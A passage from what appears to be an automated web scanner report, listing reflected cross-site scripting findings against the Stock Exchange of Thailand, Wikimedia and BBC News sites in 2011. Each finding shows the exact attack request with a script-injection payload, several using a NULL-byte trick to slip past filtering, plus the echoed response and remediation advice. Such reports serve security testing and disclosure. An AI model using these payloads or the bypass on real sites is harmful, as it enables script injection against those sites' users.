Issue detail

The value of the language request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b8962"><script>alert(1)</script>777e304694e was submitted in the language parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /mkt/topten.do?language=enb8962"><script>alert(1)</script>777e304694e&country=US HTTP/1.1
Host: marketdata.set.or.th
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:2.0) Gecko/20100101 Firefox/4.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip, deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.set.or.th/en/sitemap/for_listing.html
Cookie: _cbclose=1; _cbclose23453=1; _uid23453=0E309294.1; _ctout23453=1; __utma=96623517.407703298.1304448074.1304448074.1304448074.1; __utmb=96623517; __utmc=96623517; __utmz=96623517.1304448074.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none)

Response

HTTP/1.1 200 OK
Date: Tue, 03 May 2011 14:02:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=tis-620
Set-Cookie: JSESSIONID=0ED72526995D352CAAA31E5C590D9A4C; Path=/mkt
Content-Length: 58632


<html>
<head>
<link href="/mkt/styles/setstyle.css;jsessionid=0ED72526995D352CAAA31E5C590D9A4C" rel="stylesheet" type="text/css">
<link href="/menuFile/framework.css" rel="stylesheet" t
...[SNIP]...
<a href="stockquotation.do?symbol=BBL&language=enb8962"><script>alert(1)</script>777e304694e&country=US">
...[SNIP]...

5.29. http://meta.wikimedia.org/w/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5a37b"><script>alert(1)</script>5922412b493 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/index.php5a37b"><script>alert(1)</script>5922412b493?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400 HTTP/1.1
Host: meta.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:11 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/w/index.php5a37b"><script>alert(1)</script>5922412b493?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400
Content-Length: 6020
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq65.wikimedia.org
X-Cache-Lookup: MISS from sq65.wikimedia.org:3128
X-Cache: MISS from sq63.wikimedia.org
X-Cache-Lookup: MISS from sq63.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/w/index.php5a37b&quot;
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/index.php5a37b"><script>alert(1)</script>5922412b493?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400" title="Wikipedia:index.php5a37b">
...[SNIP]...

5.30. http://meta.wikimedia.org/w/index.php [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload a4f9d<script>alert(1)</script>4ff91371275 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /w/index.phpa4f9d<script>alert(1)</script>4ff91371275?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400 HTTP/1.1
Host: meta.wikimedia.org
Proxy-Connection: keep-alive
Referer: http://en.wikipedia.org/wiki/List_of_banks_in_Thailand
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.60 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 11:45:11 GMT
Server: Apache
Cache-Control: s-maxage=2678400, max-age=2678400
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/w/index.phpa4f9d<script>alert(1)</script>4ff91371275?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400
Content-Length: 5992
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq62.wikimedia.org
X-Cache-Lookup: MISS from sq62.wikimedia.org:3128
X-Cache: MISS from sq65.wikimedia.org
X-Cache-Lookup: MISS from sq65.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/w/index.phpa4f9d&lt;sc
...[SNIP]...
<p style="font-weight: bold;">To check for "index.phpa4f9d<script>alert(1)</script>4ff91371275?title=MediaWiki:Wikiminiatlas.js&action=raw&ctype=text/javascript&smaxage=21600&maxage=86400" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/index.phpa4f9d<script>
...[SNIP]...

5.31. http://meta.wikimedia.org/w/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the HTML document as plain text between tags. The payload %002cbbc<script>alert(1)</script>bc850f7368e was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2cbbc<script>alert(1)</script>bc850f7368e in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /w/index.php/%002cbbc<script>alert(1)</script>bc850f7368e HTTP/1.1
Host: meta.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:24:11 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/w/index.php/%002cbbc<script>alert(1)</script>bc850f7368e
Content-Length: 5426
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq60.wikimedia.org
X-Cache-Lookup: MISS from sq60.wikimedia.org:3128
X-Cache: MISS from sq66.wikimedia.org
X-Cache-Lookup: MISS from sq66.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/w/index.php/%002cbbc&l
...[SNIP]...
<p style="font-weight: bold;">To check for "index.php/%002cbbc<script>alert(1)</script>bc850f7368e" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/index.php/%002cbbc<script>
...[SNIP]...

5.32. http://meta.wikimedia.org/w/index.php [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /w/index.php

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %0018fb0"><script>alert(1)</script>a01da2cb18a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 18fb0"><script>alert(1)</script>a01da2cb18a in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /w/index.php/%0018fb0"><script>alert(1)</script>a01da2cb18a HTTP/1.1
Host: meta.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:24:06 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/w/index.php/%0018fb0"><script>alert(1)</script>a01da2cb18a
Content-Length: 5454
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:3128
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/w/index.php/%0018fb0&q
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/index.php/%0018fb0"><script>alert(1)</script>a01da2cb18a" title="Wikipedia:index.php/%0018fb0">
...[SNIP]...

5.33. http://meta.wikimedia.org/wiki/List_of_Wikipedias [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /wiki/List_of_Wikipedias

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload %00e045f"><script>alert(1)</script>75f828803d9 was submitted in the REST URL parameter 2. This input was echoed as e045f"><script>alert(1)</script>75f828803d9 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_Wikipedias%00e045f"><script>alert(1)</script>75f828803d9 HTTP/1.1
Host: meta.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:25:28 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/wiki/List_of_Wikipedias%00e045f"><script>alert(1)</script>75f828803d9
Content-Length: 5508
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq71.wikimedia.org
X-Cache-Lookup: MISS from sq71.wikimedia.org:3128
X-Cache: MISS from sq36.wikimedia.org
X-Cache-Lookup: MISS from sq36.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/wiki/List_of_Wikipedia
...[SNIP]...
<a href="http://en.wikipedia.org/wiki/List_of_Wikipedias%00e045f"><script>alert(1)</script>75f828803d9" title="Wikipedia:List_of_Wikipedias%00e045f">
...[SNIP]...

5.34. http://meta.wikimedia.org/wiki/List_of_Wikipedias [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://meta.wikimedia.org
Path:   /wiki/List_of_Wikipedias

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload %00dc82e<script>alert(1)</script>e4b8fb65c24 was submitted in the REST URL parameter 2. This input was echoed as dc82e<script>alert(1)</script>e4b8fb65c24 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) anywhere before the characters that are being blocked.

Remediation detail

NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.

Request

GET /wiki/List_of_Wikipedias%00dc82e<script>alert(1)</script>e4b8fb65c24 HTTP/1.1
Host: meta.wikimedia.org
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 404 Not Found
Date: Tue, 03 May 2011 13:25:35 GMT
Server: Apache
Cache-Control: private, s-maxage=0, max-age=0, must-revalidate
X-Wikimedia-Debug: prot=http:// serv=meta.wikimedia.org loc=/wiki/List_of_Wikipedias%00dc82e<script>alert(1)</script>e4b8fb65c24
Content-Length: 5480
Content-Type: text/html; charset=utf-8
X-Cache: MISS from sq73.wikimedia.org
X-Cache-Lookup: MISS from sq73.wikimedia.org:3128
X-Cache: MISS from sq64.wikimedia.org
X-Cache-Lookup: MISS from sq64.wikimedia.org:80
Connection: close

<html>
<head>
<meta http-equiv="Content-Type" content="text/html; charset=UTF-8">
<title>Wikimedia page not found: http://meta.wikimedia.org/wiki/List_of_Wikipedia
...[SNIP]...
<p style="font-weight: bold;">To check for "List_of_Wikipedias%00dc82e<script>alert(1)</script>e4b8fb65c24" on Wikipedia, see:
<a href="http://en.wikipedia.org/wiki/List_of_Wikipedias%00dc82e<script>
...[SNIP]...

5.35. http://news.bbc.co.uk/earth/hi/earth_news/newsid_9469000/9469456.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 59ef1'-alert(1)-'84cf7884828 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /earth/hi/earth_news/newsid_9469000/9469456.stm?59ef1'-alert(1)-'84cf7884828=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:37 GMT
Keep-Alive: timeout=10, max=786
Expires: Tue, 03 May 2011 13:24:37 GMT
Connection: close
Set-Cookie: BBC-UID=44fd0cb030b221e54da0c02661411f4e663f7b7050f0b11a14cb5a96e76457080Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=44fd0cb030b221e54da0c02661411f4e663f7b7050f0b11a14cb5a96e76457080Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43834

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429077000,
       editionToServe: null,
       queryString: '59ef1'-alert(1)-'84cf7884828=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'earthnews',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/earth/hi/earth_news/
...[SNIP]...

5.36. http://news.bbc.co.uk/go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ee1a8'-alert(1)-'9703267ab0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/earth/hi/earth_news/newsid_9469000/9469456.stm?ee1a8'-alert(1)-'9703267ab0=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:40 GMT
Keep-Alive: timeout=10, max=797
Expires: Tue, 03 May 2011 13:24:40 GMT
Connection: close
Set-Cookie: BBC-UID=64ed5c6020d231882e64af02f1db9b6589d6a5cca0c0915a142bfa057381fa2a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:40 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64ed5c6020d231882e64af02f1db9b6589d6a5cca0c0915a142bfa057381fa2a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:40 GMT; path=/; domain=bbc.co.uk;
Content-Length: 43832

<!doctype html public "-//W3C//DTD HTML 4.0 Transitional//EN" "http://www.w3.org/TR/REC-html40/loose.dtd">
<html>
<head>
<title>BBC - Earth News - GPS backpacks track NZ hedgehogs</title>
<meta na
...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429080000,
       editionToServe: null,
       queryString: 'ee1a8'-alert(1)-'9703267ab0=1',
       referrer: null,
       section: null,
       sectionPath: null,
       siteName: null,
       siteToServe: 'earthnews',
       siteVersion: '4',
       storyId: null,
       assetType: null,
       uri: '/earth/hi/earth_news/
...[SNIP]...

5.37. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/cricket/13264093.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/cricket/13264093.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 16e40'-alert(1)-'1b4f1bf80bf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/cricket/13264093.stm?16e40'-alert(1)-'1b4f1bf80bf=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:43 GMT
Keep-Alive: timeout=10, max=771
Expires: Tue, 03 May 2011 13:24:43 GMT
Connection: close
Set-Cookie: BBC-UID=a44d7cd000f2010b23733c72b1a794247b8ede2a902041ead40baa55cd8086940Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:43 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a44d7cd000f2010b23733c72b1a794247b8ede2a902041ead40baa55cd8086940Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:43 GMT; path=/; domain=bbc.co.uk;
Content-Length: 49205

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429083000,
       editionToServe: 'international',
       queryString: '16e40'-alert(1)-'1b4f1bf80bf=1',
       referrer: null,
       section: 'sri-lanka',
       sectionPath: '/cricket',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13264093',
       assetType: 'story',
   
...[SNIP]...

5.38. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/football/13265403.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/football/13265403.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7e3ac'-alert(1)-'eec7239bc49 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/football/13265403.stm?7e3ac'-alert(1)-'eec7239bc49=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:42 GMT
Keep-Alive: timeout=10, max=783
Expires: Tue, 03 May 2011 13:24:42 GMT
Connection: close
Set-Cookie: BBC-UID=64bd0c2010f2f10a6d93cb46918206752853044a3010e13a24ab9a956ff1bcd60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:42 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=64bd0c2010f2f10a6d93cb46918206752853044a3010e13a24ab9a956ff1bcd60Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:42 GMT; path=/; domain=bbc.co.uk;
Content-Length: 57719

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429082000,
       editionToServe: 'international',
       queryString: '7e3ac'-alert(1)-'eec7239bc49=1',
       referrer: null,
       section: 'europe',
       sectionPath: '/football',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13265403',
       assetType: 'story',
       u
...[SNIP]...

5.39. http://news.bbc.co.uk/go/rss/int/news/-/sport2/hi/formula_one/13267766.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 35755'-alert(1)-'f04cde5ea9f was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /go/rss/int/news/-/sport2/hi/formula_one/13267766.stm?35755'-alert(1)-'f04cde5ea9f=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:42 GMT
Keep-Alive: timeout=10, max=795
Expires: Tue, 03 May 2011 13:24:42 GMT
Connection: close
Set-Cookie: BBC-UID=146d7ce02062b1ea8e751031318b472bee611b21804031ca746bcac57311aa6a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:42 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=146d7ce02062b1ea8e751031318b472bee611b21804031ca746bcac57311aa6a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:42 GMT; path=/; domain=bbc.co.uk;
Content-Length: 51706

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429082000,
       editionToServe: 'international',
       queryString: '35755'-alert(1)-'f04cde5ea9f=1',
       referrer: null,
       section: 'formula-one',
       sectionPath: '/formula_one',
       siteName: 'BBC Sport',
       siteToServe: 'sport',
       siteVersion: 'wide',
       storyId: '13267766',
       assetType: 'stor
...[SNIP]...

5.40. http://news.bbc.co.uk/sport2/hi/cricket/13264093.stm [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://news.bbc.co.uk
Path:   /sport2/hi/cricket/13264093.stm

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload a57e1'-alert(1)-'54cf4a03b73 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sport2/hi/cricket/13264093.stm?a57e1'-alert(1)-'54cf4a03b73=1 HTTP/1.1
Host: news.bbc.co.uk
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Server: Apache
Cache-Control: max-age=0
Content-Type: text/html
Date: Tue, 03 May 2011 13:24:37 GMT
Keep-Alive: timeout=10, max=800
Expires: Tue, 03 May 2011 13:24:37 GMT
Connection: close
Set-Cookie: BBC-UID=a45d6ca0e04231e54d51620191e1b35da4f7f9aea0a0f1e91bfb23af3105f77a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Set-Cookie: BBC-UID=a45d6ca0e04231e54d51620191e1b35da4f7f9aea0a0f1e91bfb23af3105f77a0Mozilla%2f4%2e0%20%28compatible%3b%20MSIE%207%2e0%3b%20Windows%20NT%206%2e0%29; expires=Wed, 02-May-12 13:24:37 GMT; path=/; domain=bbc.co.uk;
Content-Length: 50106

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-GB" lang="en-GB">



...[SNIP]...
<!--
   bbc.fmtj.page = {
       serverTime: 1304429077000,
       editionToServe: 'international',
       queryString: 'a57e1'-alert(1)-'54cf4a03b73=1',
       referrer: null,
       section: 'sri-lanka',
       sectionPath: '/cricket',
